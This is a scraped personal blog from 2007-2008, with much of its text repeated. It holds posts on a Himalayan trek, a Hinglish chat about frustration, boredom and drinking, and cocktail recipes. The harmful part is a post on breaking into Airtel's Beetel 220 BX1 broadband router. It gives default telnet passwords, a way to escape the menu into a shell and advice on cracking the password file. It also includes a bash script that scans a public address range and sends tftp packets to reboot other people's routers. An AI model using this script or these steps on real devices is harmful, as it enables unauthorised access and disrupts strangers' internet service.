Well I am back to scribble something onto this blog sheet of mine. Its been almost 5 months since the last time I was here on March 3, 2008.
So first of all let me give u the updates of last 4-5 months.
1. Have got a job for the time being. Almost completed the probation period. Hopefully will be signed in for the job.
2. Did some Rock climbing & trekking a month back in June. Went to sino-indian borders. Went upto heights of 18,700fts above sea level and yet did not faint unlike some of my fellow trekker. Well that might be attributed to the Vodka and Brandy mix which I bought. I saw some spectacular places and some wonders of nature. Even saw a a Match Stick burn like an Incense Stick, because of low Oxygen at those places. Have seen shelling at the border and a few casualties too.
3. Have recently developed a skill of procastrination.
4. Have recently developed a liking of Death Metal Rock genre.
5. Have made some Socially KOOL so called **friends**.
6. Have turned 26 last June, yet no Gf. So according to the promise I am not even trying for one. Will drink and enjoy life will be my goal from now on.
Lessons learnt from last 4-5 months
1. God gave us brains to see and think yet we unlogically create nations and boundaries just for our greed. We differentiate among ourselves and in the end, end up losing the most important virtue - humanity. Simply being indifferent to situations makes us, even me, a part of that clan which one day will be burried with no traces left for aeons in future. What disgusts me more is that even dianosaurs were lot better.
2. I like it in adverse climate and those adventures where we get tested way more than those boring beach type adventure crap holidays people digg for.
3. Those COOL, FUNKY and the HAPPENING DUDEs and Dudettes are those person who are sissy old loosers who are lame and most idiotic people to be found roaming this planet. Their most important feature is to "GET NOTICED" and their craving for "Public Attention". As cinical as I may sound, these people put on a sort of impregnable mask to hide their innermost idiotic instincts, which has been misinterpreted by the society, we live in, as the FUNK-Factor of that person.
Well its seems like I have been bitching a lot. But its the sheer frustration when you get to discover the inner thoughtprocess of these kind of people. In my opinion plain simple and down to earth people are the people who are the strongest ones, who dares to admit their flaws and weakness.
On a concluding note I will try to impove and will try do some new things which I have not done before.
Tuesday, July 22, 2008
Monday, March 3, 2008
Wednesday, February 20, 2008
FRUST-ness
The Term Frust was 1st coined in IIT,Institute of Infinite Tensions, from the English word Frustrated. Since early days when a guy used to get frustrated becoz of Profs. making them study(mugga) or becoz of Bandi or any other Issues, the term "FRUST" started getting used.
Synonyms Being:
pHroooosT ,
Paak Jana,
Fraastu ,
Frusted ,
Jhaand Hona ,
Dimag ka Dahi/Lassi ho Jaana.
Question: So today, after so many decades of ppl getting frust, Why The Hell in this World am I writing about IT ???
Answer: In the term "FRUST" lies greatness beyond all knowledge. Infact saying it the other way around Its The means to get ENLIGHTENED, to achieve Moksa.
Question: How, Why, When, Where ?
Answer: Since we are talking about this glorious term FRUST, it can't be explained just by a few answers(how to-s). Its a path of self realization to the TRUTH of this WORLD. So I am going to talk about a discussion with one of my very very close friend "Niggu Vimal"
I have been suffering from This Frust-ness since last couple of months. So yesterday I started talking to nIggu
==== Chat ====
Me: yaar kuch bhi karne ka dil nahi karta hai
pahele wo jo compu compu karte tha ..aaj kal wo bhi nahi ..
Niggu: kya hua >:D<
haaan
Me: sirf compu compu ka dil karta tha .. ab to wo bhi nahi karne ko dil karta hai
Niggu: niggu >:D<
Me: infact tv movie yaa fir kuch bhi karne ka dil nahi karta hai
>:D<
infact ab to sone tak kaa dil nahi karta .. leta rahetaa hoon but neend to kabhi kabhi hi aati hai
Niggu: kya hua
Me: kaa kare bolo to ..
Niggu: ee batao
Me: pata nahi kaa hua
sab to theek thaak hi laag raha hai
man uubh saa gaya hai
Niggu: naah
sahi sahi batao
ka hua hai
Me: pata nahi dost
humko khud pata nahi
ab tumse kya chupana :P
Niggu: :D
pata hai ka hai panga tumri life mein
Me: batao
Niggu: sach sach bataun
Me: sala humko to bujha hi nahi raha
haan ek dum ..
plzz debug kar do
Niggu: bura nahi manoge na
Me: nahi naa
bilkul nahi ..
Niggu: niggu tumko pata nahi
lekin college ke dino se jo humko life mein ache bande lagte the
usme se ek tum the
vaisan vala acha nahi :P
Me: :P
Niggu: ache insaano vala acha
Me: hehehe
Niggu: aur tum sabon mein ek cheez common tha
ye ki sale bahut jyada modest the
is haad tak ki talent hote hue bhi accept nahi karte the
Me: hmmm ..
bhaaiwaa .. kucho palle nahi pad raha hai
Niggu: bolne do
Me: ok
Niggu: aur sabko ye lagta tha ki bheed ka part banke hi tumko recogniztion mil sakti hai
i mean log tumko accept karenge
bhaiwa hum kabhi kabhi sahi word use nahi kar paunga to bhool chuk maaf kar dena
Me: :P
jaroor
Niggu: isliye u guys all tried to be like them
aur yahi cheez tum logon ko har jagah rokti hai
and sab jagah frust karti hai
Goplu ka bhi vahi haal hai
tera bhi vahi haal hai
ek do aur hain unka bhi vahi haal hai
isliye sab life se frust hain
isliye tum log hamesha vaise hi act karte the jo bheed mein acceptable tha
but u guys are best in the way u r
not the way others expect u to be
isliye kabhi tumlogon na apne mann ki bolte ho and na karte ho
and this is one of the main reason jiske karan log teri log tumlog ka fayada uthate hain
and tumlog hamesha frust rahte ho
sorry be
Me: hmmm
Niggu: me bahut baar tere ko and Goplu ko ye baat bolne ka socha
lekin bol nahi paya
Me: sorry kahe
Niggu: i like u guys the way u r
Me: dhurr dhurr
abe jaante ho ..ab aisa bologe to sala hum job chor ke duniya bhraaman ke liye nikal jaaunga
Niggu: there a lot of things in u guys which are rare to find in avergae human beings
and to top it up u guys are modest to the extent that it hampers ur progress
Me: bhaaiwa solution batao naa ...
Niggu: bhaiwa solution ander se aana chahiye
Me: theory bahut fadu hai ..
Niggu: jaise ho vaise raho
kisi ke liye mat jeao
apne liye jeao
ache ek baat bolun manoge
?
Me: bolo bolo
Niggu: nahi pahle ye batao
tum selfish ho
Me: tumhra baat to humesha maante hai
Niggu: khud ko gali dene ke liye mat bolna
soch ke bolo
jo tumhara selfish ka definition hai uske hisab se bolna
Me: haan hoon bahut selfish hoon
Niggu: aur kya sochte ho
duniya selfish hai
?
i mean dusre log
jo tumko ache lagte hain
Me: nahi yaar
hum kuch bhi sochte hi nahi hai
Niggu: duniya mein sab selfish hain
haan
tell me
Me: hum khud ko bhi selfish nahi sochte
Niggu: and sachai ye hai ki sab selfish hai
Me: actually hum frust ho gaye hai
pata nahi kahe
Niggu: nah
tum frust nahi ho
tum bahut happy insaan ho
tumne sale vo kiya hai jo tum karna chahte the
and u r one of the best in ur field
aur haan
thoda frust sab hai
jis din content ho jaoge
us din progress ruk jauegi
Me: :O
Niggu: jayegi*
==== End of Chat ====
I asked him when is this path of pain going to END. What he told came to me as a BIG SHOCK!
Frust-ness, an essential element for Progress ??? Without it our progress stops. These questions set my logic spinning...
Was it true??? Then I suddenly remembered that Even the goplu who was mentioned here told the same.
I guess two people can't be wrong at the same time. The probability, now is very less for all three of us or more to be wrong.
So this is when I realized that only when we WALK THROUGH THIS PATH OF FRUST-ness ONLY THEN CAN WE REALIZE WHAT WE REALLY WANT.
So the thing is When we walk through this path we tend to lose interest in everything and often get desperate. This desperateness is the key. We either do something with that desperateness and go ahead or we tend to be passive and do nothing. Key can Unlock the Lock but its You who have to use the KEY and open it.
BUT please note There is this PATH of FRUST-ness which leads to your GOALS, but whether You decide to walk through it till the End or Stop In Between and be there for ever IS UP TO YOU..
So Let Me Walk Hand in Hand Through this Path with You.
Synonyms Being:
pHroooosT ,
Paak Jana,
Fraastu ,
Frusted ,
Jhaand Hona ,
Dimag ka Dahi/Lassi ho Jaana.
Question: So today, after so many decades of ppl getting frust, Why The Hell in this World am I writing about IT ???
Answer: In the term "FRUST" lies greatness beyond all knowledge. Infact saying it the other way around Its The means to get ENLIGHTENED, to achieve Moksa.
Question: How, Why, When, Where ?
Answer: Since we are talking about this glorious term FRUST, it can't be explained just by a few answers(how to-s). Its a path of self realization to the TRUTH of this WORLD. So I am going to talk about a discussion with one of my very very close friend "Niggu Vimal"
I have been suffering from This Frust-ness since last couple of months. So yesterday I started talking to nIggu
==== Chat ====
Me: yaar kuch bhi karne ka dil nahi karta hai
pahele wo jo compu compu karte tha ..aaj kal wo bhi nahi ..
Niggu: kya hua >:D<
haaan
Me: sirf compu compu ka dil karta tha .. ab to wo bhi nahi karne ko dil karta hai
Niggu: niggu >:D<
Me: infact tv movie yaa fir kuch bhi karne ka dil nahi karta hai
>:D<
infact ab to sone tak kaa dil nahi karta .. leta rahetaa hoon but neend to kabhi kabhi hi aati hai
Niggu: kya hua
Me: kaa kare bolo to ..
Niggu: ee batao
Me: pata nahi kaa hua
sab to theek thaak hi laag raha hai
man uubh saa gaya hai
Niggu: naah
sahi sahi batao
ka hua hai
Me: pata nahi dost
humko khud pata nahi
ab tumse kya chupana :P
Niggu: :D
pata hai ka hai panga tumri life mein
Me: batao
Niggu: sach sach bataun
Me: sala humko to bujha hi nahi raha
haan ek dum ..
plzz debug kar do
Niggu: bura nahi manoge na
Me: nahi naa
bilkul nahi ..
Niggu: niggu tumko pata nahi
lekin college ke dino se jo humko life mein ache bande lagte the
usme se ek tum the
vaisan vala acha nahi :P
Me: :P
Niggu: ache insaano vala acha
Me: hehehe
Niggu: aur tum sabon mein ek cheez common tha
ye ki sale bahut jyada modest the
is haad tak ki talent hote hue bhi accept nahi karte the
Me: hmmm ..
bhaaiwaa .. kucho palle nahi pad raha hai
Niggu: bolne do
Me: ok
Niggu: aur sabko ye lagta tha ki bheed ka part banke hi tumko recogniztion mil sakti hai
i mean log tumko accept karenge
bhaiwa hum kabhi kabhi sahi word use nahi kar paunga to bhool chuk maaf kar dena
Me: :P
jaroor
Niggu: isliye u guys all tried to be like them
aur yahi cheez tum logon ko har jagah rokti hai
and sab jagah frust karti hai
Goplu ka bhi vahi haal hai
tera bhi vahi haal hai
ek do aur hain unka bhi vahi haal hai
isliye sab life se frust hain
isliye tum log hamesha vaise hi act karte the jo bheed mein acceptable tha
but u guys are best in the way u r
not the way others expect u to be
isliye kabhi tumlogon na apne mann ki bolte ho and na karte ho
and this is one of the main reason jiske karan log teri log tumlog ka fayada uthate hain
and tumlog hamesha frust rahte ho
sorry be
Me: hmmm
Niggu: me bahut baar tere ko and Goplu ko ye baat bolne ka socha
lekin bol nahi paya
Me: sorry kahe
Niggu: i like u guys the way u r
Me: dhurr dhurr
abe jaante ho ..ab aisa bologe to sala hum job chor ke duniya bhraaman ke liye nikal jaaunga
Niggu: there a lot of things in u guys which are rare to find in avergae human beings
and to top it up u guys are modest to the extent that it hampers ur progress
Me: bhaaiwa solution batao naa ...
Niggu: bhaiwa solution ander se aana chahiye
Me: theory bahut fadu hai ..
Niggu: jaise ho vaise raho
kisi ke liye mat jeao
apne liye jeao
ache ek baat bolun manoge
?
Me: bolo bolo
Niggu: nahi pahle ye batao
tum selfish ho
Me: tumhra baat to humesha maante hai
Niggu: khud ko gali dene ke liye mat bolna
soch ke bolo
jo tumhara selfish ka definition hai uske hisab se bolna
Me: haan hoon bahut selfish hoon
Niggu: aur kya sochte ho
duniya selfish hai
?
i mean dusre log
jo tumko ache lagte hain
Me: nahi yaar
hum kuch bhi sochte hi nahi hai
Niggu: duniya mein sab selfish hain
haan
tell me
Me: hum khud ko bhi selfish nahi sochte
Niggu: and sachai ye hai ki sab selfish hai
Me: actually hum frust ho gaye hai
pata nahi kahe
Niggu: nah
tum frust nahi ho
tum bahut happy insaan ho
tumne sale vo kiya hai jo tum karna chahte the
and u r one of the best in ur field
aur haan
thoda frust sab hai
jis din content ho jaoge
us din progress ruk jauegi
Me: :O
Niggu: jayegi*
==== End of Chat ====
I asked him when is this path of pain going to END. What he told came to me as a BIG SHOCK!
Frust-ness, an essential element for Progress ??? Without it our progress stops. These questions set my logic spinning...
Was it true??? Then I suddenly remembered that Even the goplu who was mentioned here told the same.
I guess two people can't be wrong at the same time. The probability, now is very less for all three of us or more to be wrong.
So this is when I realized that only when we WALK THROUGH THIS PATH OF FRUST-ness ONLY THEN CAN WE REALIZE WHAT WE REALLY WANT.
So the thing is When we walk through this path we tend to lose interest in everything and often get desperate. This desperateness is the key. We either do something with that desperateness and go ahead or we tend to be passive and do nothing. Key can Unlock the Lock but its You who have to use the KEY and open it.
BUT please note There is this PATH of FRUST-ness which leads to your GOALS, but whether You decide to walk through it till the End or Stop In Between and be there for ever IS UP TO YOU..
So Let Me Walk Hand in Hand Through this Path with You.
Monday, February 18, 2008
I'm crazy ..I know it ..
haah ... what a topic to start with ...
new to blogging .. so don't know what to write ...
last time i tried it became a recipe book for 13 different cocktails ..
so now after revelation why i had written that .. i think i am on the verge of becoming a wino .. a drunkard ..
But the question is why do i drink ???
its not that I am sad or heart broken or anything .. Its like I dont have anything else to do and feel good about .. Life as it is has become monotonous and filled up with boredom.
Am I the one to be blamed ???
Or is it my job ???
or is it something else ..
Its not that I am an introvert or anything ..
I do talk to ppl a lot .. and can make friends very easily .. (putting that aside)
The thing is I really don't connect with ppl or may be can't anymore ..
Its like even talking to ppl over something totally new topic doesn't excite me any more ..
At one point of my life technology seemed interesting .. had to find out how things work ..etc etc .. i did that .. learned a lot but now don't feel like it anymore ..
That facet of me has died i guess .. don't feel like doing anything ..
feel like sleeping but can't sleep anymore ..
I loiter around in the nights ... don't know what i am missing .. what I should do to make this "boring" life a bit more exciting ..
going this way .. in a year or two .. i'll be like a walking zombie or something ..
zombie since neither it has any goal nor any destination ..
Can someone help me in this regards by giving me some idea...?????????????
new to blogging .. so don't know what to write ...
last time i tried it became a recipe book for 13 different cocktails ..
so now after revelation why i had written that .. i think i am on the verge of becoming a wino .. a drunkard ..
But the question is why do i drink ???
its not that I am sad or heart broken or anything .. Its like I dont have anything else to do and feel good about .. Life as it is has become monotonous and filled up with boredom.
Am I the one to be blamed ???
Or is it my job ???
or is it something else ..
Its not that I am an introvert or anything ..
I do talk to ppl a lot .. and can make friends very easily .. (putting that aside)
The thing is I really don't connect with ppl or may be can't anymore ..
Its like even talking to ppl over something totally new topic doesn't excite me any more ..
At one point of my life technology seemed interesting .. had to find out how things work ..etc etc .. i did that .. learned a lot but now don't feel like it anymore ..
That facet of me has died i guess .. don't feel like doing anything ..
feel like sleeping but can't sleep anymore ..
I loiter around in the nights ... don't know what i am missing .. what I should do to make this "boring" life a bit more exciting ..
going this way .. in a year or two .. i'll be like a walking zombie or something ..
zombie since neither it has any goal nor any destination ..
Can someone help me in this regards by giving me some idea...?????????????
Tuesday, February 5, 2008
Bacardi Cocktails for Dummies :)
****DISCLAIMER****
=====================================================================
=I am not responsible for whatever u do after u prepare my recipes. =
=U r solely responsible for ur own set of Actions after Intoxication=
=I am not responsible if u dont like this recipes/shit/crap/bullshit=
=These Cocktails are mostly not available in India so dont try alone=
=I aint responsible if U get Caught by Cops while being intoxicated =
= And the Last and the Main Point =
= This is just for EDUCATIONAL PURPOSES ONLY =
=====================================================================
Recipes:
A.
===
Go-Go Girl
===========
1 60 ml of Bacardi® White Rum
2 10 ml of mango Juice
3 10 ml of pineapple juice
+ ICE as it suits u.
B.
===
Tsunami
========
1. 30 ml Blue Curacao liqueur
2. 30 ml Bacardi® white rum
3. Mountain Dew® citrus soda
+ Lehar Slice [2 Taste] + ICE
C.
===
Jamaican Kick
==============
30 ml of Bacardi® white rum
20 ml of Malibu® coconut rum
10 ml of banana liqueur
1 cranberry juice [can find it in some super mart]
1 pineapple juice
D.
===
Hurricane .1
=============
10 of Myer's® dark rum
50 of Bacardi® light rum
2 of orange juice
2 of pineapple juice
1 1/2 tsp grenadine syrup
2 cherries
1 pineapple chunk
1 tsp sugar [brown sugar preferable [gur wala chini]]
E.
===
Godzilla/KingKong Smile [Dont remember the Name exactly.. spl for fruit lovers]
================================================================================
1/2 banana
3 strawberries
10 ML of fruit punch
20 of Bacardi® light rum
20 of banana rum
10 of peach squash [ + few slices of peach will do fine ]
F.
===
Lip Stick cocktail
==================
30 ml oz Bacardi® white rum
20 ml banana rum
10 ml fruit cream
5 ml grenadine syrup
G.
===
Dominican Recipe:
==================
50 ml Bacardi® white rum
10 ml grapefruit juice
+ lemon-lime soda [2 taste]
H.
===
Bacardi Hurricane
====================
30 ml Bacardi® white rum
30 ml Bacardi® black rum [available in Mumbai/Bangy Bars]
30 ml Fruit syrup
+ Sugar Syrup 2 taste [or one can remove fruit syrup and add rooafzaa [the red one]]
I.
===
Bali Dream [2 pegs]
========================
20 ml Bacardi® white rum
20 ml Bacardi® black rum
20 ml banana´s juice
20 ml Passoa brandy/rum
10 ml coconut rum
10 ml grenadine/sugar syrup
20 ml orange juice
J.
===
Mai Tai [Chinese or Japanese or taiwan´s drink donno ..n dinn understand ]
===========================================================================
30 ml Bacardi® dark rum
10 ml Bacardi® light rum
10 ml triple sec
10 ml Tropicana® orange juice
10 ml canned pineapple juice
10 ml grenadine/sugar syrup or rooafzaaaaaaaaaaaaaaaaaa will also do.
+ ice cubes
K.
===
Flying Hawaii
==============
10 ml Melon rum
50 ml Bacardi® white rum
10 ml Sprite® soda
10 ml pineapple juice
+ ice
L.
===
Black Rose.
============
50 ml Bacardi® white rum
10 ml Coca-Cola®
10 ml lime juice
+ ice
M.
===
Blond BombShell
================
2 cups crushed ice
50 ml Bacardi® light rum
1 can frozen lemonade concentrate [lemon juice ko garah kar lena with sugar]
Well 13 recipes so far .. Some of my favs among a lot.
Even u can go crazy with some mixes .. let me know if u make some crazy shit ..
gauravsaha [**AT**] gmail [**DOT**] com
=====================================================================
=I am not responsible for whatever u do after u prepare my recipes. =
=U r solely responsible for ur own set of Actions after Intoxication=
=I am not responsible if u dont like this recipes/shit/crap/bullshit=
=These Cocktails are mostly not available in India so dont try alone=
=I aint responsible if U get Caught by Cops while being intoxicated =
= And the Last and the Main Point =
= This is just for EDUCATIONAL PURPOSES ONLY =
=====================================================================
Recipes:
A.
===
Go-Go Girl
===========
1 60 ml of Bacardi® White Rum
2 10 ml of mango Juice
3 10 ml of pineapple juice
+ ICE as it suits u.
B.
===
Tsunami
========
1. 30 ml Blue Curacao liqueur
2. 30 ml Bacardi® white rum
3. Mountain Dew® citrus soda
+ Lehar Slice [2 Taste] + ICE
C.
===
Jamaican Kick
==============
30 ml of Bacardi® white rum
20 ml of Malibu® coconut rum
10 ml of banana liqueur
1 cranberry juice [can find it in some super mart]
1 pineapple juice
D.
===
Hurricane .1
=============
10 of Myer's® dark rum
50 of Bacardi® light rum
2 of orange juice
2 of pineapple juice
1 1/2 tsp grenadine syrup
2 cherries
1 pineapple chunk
1 tsp sugar [brown sugar preferable [gur wala chini]]
E.
===
Godzilla/KingKong Smile [Dont remember the Name exactly.. spl for fruit lovers]
================================================================================
1/2 banana
3 strawberries
10 ML of fruit punch
20 of Bacardi® light rum
20 of banana rum
10 of peach squash [ + few slices of peach will do fine ]
F.
===
Lip Stick cocktail
==================
30 ml oz Bacardi® white rum
20 ml banana rum
10 ml fruit cream
5 ml grenadine syrup
G.
===
Dominican Recipe:
==================
50 ml Bacardi® white rum
10 ml grapefruit juice
+ lemon-lime soda [2 taste]
H.
===
Bacardi Hurricane
====================
30 ml Bacardi® white rum
30 ml Bacardi® black rum [available in Mumbai/Bangy Bars]
30 ml Fruit syrup
+ Sugar Syrup 2 taste [or one can remove fruit syrup and add rooafzaa [the red one]]
I.
===
Bali Dream [2 pegs]
========================
20 ml Bacardi® white rum
20 ml Bacardi® black rum
20 ml banana´s juice
20 ml Passoa brandy/rum
10 ml coconut rum
10 ml grenadine/sugar syrup
20 ml orange juice
J.
===
Mai Tai [Chinese or Japanese or taiwan´s drink donno ..n dinn understand ]
===========================================================================
30 ml Bacardi® dark rum
10 ml Bacardi® light rum
10 ml triple sec
10 ml Tropicana® orange juice
10 ml canned pineapple juice
10 ml grenadine/sugar syrup or rooafzaaaaaaaaaaaaaaaaaa will also do.
+ ice cubes
K.
===
Flying Hawaii
==============
10 ml Melon rum
50 ml Bacardi® white rum
10 ml Sprite® soda
10 ml pineapple juice
+ ice
L.
===
Black Rose.
============
50 ml Bacardi® white rum
10 ml Coca-Cola®
10 ml lime juice
+ ice
M.
===
Blond BombShell
================
2 cups crushed ice
50 ml Bacardi® light rum
1 can frozen lemonade concentrate [lemon juice ko garah kar lena with sugar]
Well 13 recipes so far .. Some of my favs among a lot.
Even u can go crazy with some mixes .. let me know if u make some crazy shit ..
gauravsaha [**AT**] gmail [**DOT**] com
Monday, September 24, 2007
Airtel BroadBand Vulnerable to wide range of Attacks.
Airtel BroadBand provides the users with "Beetel 220 BX1" ASDL2+ CPE
This product of beetel's has embedded linux (prolly some RTOS linux)
There are a varied number of services running on the system. I am going to explain how to HACK(!crack) into the box for FUN & Profit.
The box comes with default IP Gateway = 192.168.1.1
and ur machine takes up 192.168.1.2 IP address.
what you have to do is :-
telnet 192.168.1.1
now there are 3 usernames by default.
"admin"
"support"
"user"
and their default passwords are :-
USERNAME-------->PASSWORD
"admin" -------->password
"support"------->supportuser
"user"---------->normaluser
now You can log into the Machine.
There will be some changes wrt normal linux box. But its ok. Its nice.
there might be a menu like :
Note: If you have problem with Backspace key, please make sure you configure your terminal emulator settings. For instance, from HyperTerminal you would need to use File->Properties->Setting->Back Space key sends.
Main Menu
1. ADSL Link State
2. LAN
3. WAN
4. DNS Server
5. Route Setup
6. NAT
7. Firewall
8. Quality Of Service
9. Management
10. Passwords
11. Reset to Default
12. Save and Reboot
13. Exit
->
now this is one lame script ...U can exit (bypass) this script by typing "sh" command.
now u have an ~somewhat~ workable shell(konsole)
now type "help" u will get :-
Built-in commands:
-------------------
. : break cd continue eval exec exit export help login newgrp
read readonly set shift times trap umask wait [ busybox cat df
dmesg echo expr false ifconfig init insmod kill klogd linuxrc
logger logread mkdir mount msh ping ps pwd reboot rm rmmod route
sendarp sh sysinfo syslogd test tftp tftpd true tty vconfig
now u do ls /ls -a/ls -al ...mmmmmm it does not work ..shit ...what to do now ?
ls <--- does not work ...
so we will use an alternative "echo *" like in very old digital unix boxes which we had in college(kgp).
now on doing "echo *":-
# echo *
bin dev etc lib linuxrc mnt proc sbin usr var webs
#
ok now this seems a bit OK!! thank G0d(if exist any)...
next step ...do a ps -xa :))
# ps -xa
PID Uid VmSize Stat Command
1 admin 248 S init
2 admin SWN [ksoftirqd/0]
3 admin SW< [events/0]
4 admin SW< [khelper]
5 admin SW< [kblockd/0]
6 admin SW [pdflush]
7 admin SW [pdflush]
8 admin SW [kswapd0]
9 admin SW< [aio/0]
10 admin SW [mtdblockd]
17 admin 292 S -sh
35 admin 532 S cfm
121 admin 176 S pvc2684d
205 admin 212 S dhcpd
211 admin 280 S syslogd -C -l 7
212 admin 540 S telnetd
216 admin 148 S bftpd
219 admin 180 S tftpd
220 admin 648 S httpd
222 admin 216 S klogd
226 admin 332 S pppd -c 1.32.1 -r airtel -i nas_1_32 -u 040xxxxxxxxxxxx
274 admin 196 S /bin/dnsprobe
278 admin 268 S upnp -L br0 -W ppp_1_32_1 -D
339 admin 600 S telnetd
340 admin 264 S sh -c sh
341 admin 304 S sh
345 admin 248 R ps -xa
#
HOLY SHIT .... SO MANY process running in this small b0x :-P
now what processor does it have :-O
lets check ....
# cd /proc
# echo *
1 10 121 17 2 205 211 212 216 219 220 222 226 274 278 286 3 339 340 341 35 4 5 6 7 8 9 buddyinfo bus cmdline cpuinfo devices diskstats driver execdomains filesystems fs interrupts iomem ioports irq kcore kmsg loadavg locks meminfo misc modules mounts mtd net partitions self slabinfo stat sys sysvipc tty uptime var version vmstat
# cat cpuinfo
system type : 96338L-2M-8M
processor : 0
cpu model : BCM6338 V1.0
BogoMIPS : 235.52
wait instruction : no
microsecond timers : yes
tlb_entries : 32
extra interrupt vector : yes
hardware watchpoint : no
VCED exceptions : not available
VCEI exceptions : not available
#
hmmmmmmm ........
# cat meminfo
MemTotal: 6164 kB
MemFree: 520 kB
Buffers: 80 kB
Cached: 1144 kB
SwapCached: 0 kB
Active: 2172 kB
Inactive: 112 kB
HighTotal: 0 kB
HighFree: 0 kB
LowTotal: 6164 kB
LowFree: 520 kB
SwapTotal: 0 kB
SwapFree: 0 kB
Dirty: 0 kB
Writeback: 0 kB
Mapped: 2036 kB
Slab: 2104 kB
Committed_AS: 2916 kB
PageTables: 304 kB
VmallocTotal: 1048560 kB
VmallocUsed: 688 kB
VmallocChunk: 1047836 kB
#
man this box is such a bottleneck ... :(( [may be this is why my net is always so slow :p]
# cat /etc/issue
cat: /etc/issue: No such file or directory
#
hmmmmmm.... it doesn't ...what to do ....
# cat /proc/version
Linux version 2.6.8.1 (root@localhost.localdomain) (gcc version 3.4.2) #1 Fri Dec 23 09:56:55 CST 2005
#
hmmm .............
gcc :)) well i think i can have phun ..... :)) =)) >:) \:D/ <:-p
# gcc
gcc: not found
# cc
cc: not found
#
:(( guess not .... :(( shit ..f*** a$$h**** ... now what fun is linux without gcc ...
may be that's the reason they had ...2 make us not have phun :P ...well fu** them ... we will still have phun .... :D
121 admin 176 S pvc2684d
205 admin 212 S dhcpd
211 admin 280 S syslogd -C -l 7
212 admin 540 S telnetd
216 admin 148 S bftpd
219 admin 180 S tftpd
220 admin 648 S httpd
222 admin 216 S klogd
226 admin 332 S pppd -c 1.32.1 -r airtel -i nas_1_32 -u 040XXXXXX <--- (X)
274 admin 196 S /bin/dnsprobe
278 admin 268 S upnp -L br0 -W ppp_1_32_1 -D
339 admin 600 S telnetd
340 admin 264 S sh -c sh
341 admin 308 S sh
355 admin 248 R ps -xa
(X) == UR PHONE NUMBER (040400XXXXX)
NOW ...
the servers running on the box are of interest .........
httpd, tftpd, bftpd, telnetd.....
now what ....
well we will start fuzzing .....these daemons.... lets see what's the output ...
[I will just give and example with tftpd... an source of a client is attached with it+ a simple tiny miny winnie script which scans the Class B network and reboots the boxes :-P )
........ [this is how u can have fun ...ppl who know the VA process know what to do next ]
Hey check out /etc directory .....
few cool files there ... like passwd, default.cfg ....etc etc ...
default.cfg has base64 encoded password which is used when the box is RSTed....
and passwd file can be cracked open by john in 1 min ...
try those ....
check out all those files which might give some info about the boxx ... now that's Hacking :)
ok ... now something NICE ... ok naa ????
now what is this ...
226 admin 332 S pppd -c 1.32.1 -r airtel -i nas_1_32 -u 040XXXXXX
well u tell me :)
now its a daemon which is using ur phone number ... [:o why so ]
WHO Knows ... I am not going to give u anymore answers... OTHERWISE I will be JAILED[:o hooooaaa ...wtf ...yes ...Since there are LAWs In INDIA now ... ;)
but what if ...i cange the phone number .... what can i get :-P
who knows ... may be u can hijack phones or may be u can get the same speed of that user to whom the phone belongs .... who knows ...
if u want to find out ..please go ahead .... do iton ur own ...
I wish u best of luck ....and happy hacking :D
===== CODE =====
#!/bin/bash
var0=1
LIMIT=255
var1=1
while [ "$var1" -lt "$LIMIT" ]
do
var1=`expr $var1 + 1`
state=`nmap -sP -T Insane 122.169.$var1.1 | grep up | cut -d '(' -f2 | cut -d '.' -f1-3 | grep hosts | cut -d ' ' -f1 | wc -l`
if [ $state -eq 0 ]
then
echo -ne "Sending Packet to $1.$var1 Network Segment\n"
while [ "$var0" -lt "$LIMIT" ]
do
var0=`expr $var0 + 1` # var0=$(($var0+1)) also works.
# var0=$((var0 + 1)) also works.
# let "var0 += 1" also works.
if [ $var0 -ne 159 ] #159 is my ipaddr so to not boot mine
then
./tftp $1.$var1.$var0 69 S a > /dev/null 2>&1 &
fi
done # Various other methods also work.
sleep 5s
fi
done
echo
exit 0
===== END of CODE ======
./tftp == STANDARD TFTP CLIENT
This product of beetel's has embedded linux (prolly some RTOS linux)
There are a varied number of services running on the system. I am going to explain how to HACK(!crack) into the box for FUN & Profit.
The box comes with default IP Gateway = 192.168.1.1
and ur machine takes up 192.168.1.2 IP address.
what you have to do is :-
telnet 192.168.1.1
now there are 3 usernames by default.
"admin"
"support"
"user"
and their default passwords are :-
USERNAME-------->PASSWORD
"admin" -------->password
"support"------->supportuser
"user"---------->normaluser
now You can log into the Machine.
There will be some changes wrt normal linux box. But its ok. Its nice.
there might be a menu like :
Note: If you have problem with Backspace key, please make sure you configure your terminal emulator settings. For instance, from HyperTerminal you would need to use File->Properties->Setting->Back Space key sends.
Main Menu
1. ADSL Link State
2. LAN
3. WAN
4. DNS Server
5. Route Setup
6. NAT
7. Firewall
8. Quality Of Service
9. Management
10. Passwords
11. Reset to Default
12. Save and Reboot
13. Exit
->
now this is one lame script ...U can exit (bypass) this script by typing "sh" command.
now u have an ~somewhat~ workable shell(konsole)
now type "help" u will get :-
Built-in commands:
-------------------
. : break cd continue eval exec exit export help login newgrp
read readonly set shift times trap umask wait [ busybox cat df
dmesg echo expr false ifconfig init insmod kill klogd linuxrc
logger logread mkdir mount msh ping ps pwd reboot rm rmmod route
sendarp sh sysinfo syslogd test tftp tftpd true tty vconfig
now u do ls /ls -a/ls -al ...mmmmmm it does not work ..shit ...what to do now ?
ls <--- does not work ...
so we will use an alternative "echo *" like in very old digital unix boxes which we had in college(kgp).
now on doing "echo *":-
# echo *
bin dev etc lib linuxrc mnt proc sbin usr var webs
#
ok now this seems a bit OK!! thank G0d(if exist any)...
next step ...do a ps -xa :))
# ps -xa
PID Uid VmSize Stat Command
1 admin 248 S init
2 admin SWN [ksoftirqd/0]
3 admin SW< [events/0]
4 admin SW< [khelper]
5 admin SW< [kblockd/0]
6 admin SW [pdflush]
7 admin SW [pdflush]
8 admin SW [kswapd0]
9 admin SW< [aio/0]
10 admin SW [mtdblockd]
17 admin 292 S -sh
35 admin 532 S cfm
121 admin 176 S pvc2684d
205 admin 212 S dhcpd
211 admin 280 S syslogd -C -l 7
212 admin 540 S telnetd
216 admin 148 S bftpd
219 admin 180 S tftpd
220 admin 648 S httpd
222 admin 216 S klogd
226 admin 332 S pppd -c 1.32.1 -r airtel -i nas_1_32 -u 040xxxxxxxxxxxx
274 admin 196 S /bin/dnsprobe
278 admin 268 S upnp -L br0 -W ppp_1_32_1 -D
339 admin 600 S telnetd
340 admin 264 S sh -c sh
341 admin 304 S sh
345 admin 248 R ps -xa
#
HOLY SHIT .... SO MANY process running in this small b0x :-P
now what processor does it have :-O
lets check ....
# cd /proc
# echo *
